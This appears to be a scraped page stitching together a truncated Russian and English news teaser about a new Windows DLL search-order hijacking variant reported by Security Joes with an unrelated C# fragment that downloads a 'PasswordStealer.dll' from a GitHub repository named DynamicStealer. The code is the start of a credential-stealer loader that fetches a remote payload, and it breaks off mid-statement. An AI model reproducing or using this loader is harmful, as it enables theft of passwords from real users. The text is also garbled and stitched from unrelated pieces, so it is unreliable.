Исследователи безопасности подробно описали новый вариант метода перехвата порядка поиска в библиотеке динамических ссылок (DLL), который может использоваться злоумышленниками для обхода механизмов безопасности и выполнения вредоносного кода в системах под управлением Microsoft Windows 10 и...
An attacker can execute arbitrary code without elevating privileges.
Security company Security Joes identified a new version of the method of intercepting the search order for DLL libraries, which can be used by attackers to bypass security mechanisms and execute malicious code on systems...
We will use the System.Reflections namespace
public static byte[] GetLibrary()
{
byte[] dll = new byte[0];
string url = "https://raw.githubusercontent.com/L1ghtM4n/DynamicStealer/main/DLL/PasswordStealer.dll";
using (var client = new WebClient())
{
try {
dll...